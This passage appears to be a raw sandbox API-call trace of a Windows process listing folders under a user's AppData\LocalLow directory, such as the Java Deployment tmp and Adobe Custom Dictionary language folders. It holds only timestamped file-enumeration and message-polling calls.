HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0238.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0238.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0238.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0238.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0238.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.141] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.141] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.141] PathFindFileNameW (pszPath="") returned="" [0238.141] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.142] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.142] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 1 [0238.142] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 0 [0238.142] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.142] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.142] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\") returned="all\\" [0238.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.143] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.143] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.143] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.143] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.143] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.143] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.143] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.143] PathFindFileNameW (pszPath="") returned="" [0238.143] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.144] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.144] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.144] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.146] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.146] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\") returned="brt\\" [0238.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.146] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.146] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.147] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.147] PathFindFileNameW (pszPath="") returned="" [0238.147] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.152] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.152] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.152] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.152] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\") returned="brz\\" [0238.152] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.153] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.153] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.153] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.153] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.153] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.153] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.153] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.153] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.153] PathFindFileNameW (pszPath="") returned="" [0238.153] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.154] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.154] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.154] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.155] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.155] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\") returned="dan\\" [0238.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.155] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.155] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.156] PathFindFileNameW (pszPath="") returned="" [0238.156] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.156] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.156] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.156] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.156] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.156] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\") returned="dut\\" [0238.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.157] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.157] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.157] PathFindFileNameW (pszPath="") returned="" [0238.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.158] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.158] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.158] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.159] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.159] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\") returned="eng\\" [0238.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.159] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.159] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.159] PathFindFileNameW (pszPath="") returned="" [0238.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.160] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.160] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.160] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.160] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.160] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.160] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\") returned="frn\\" [0238.161] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.161] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.161] PathFindFileNameW 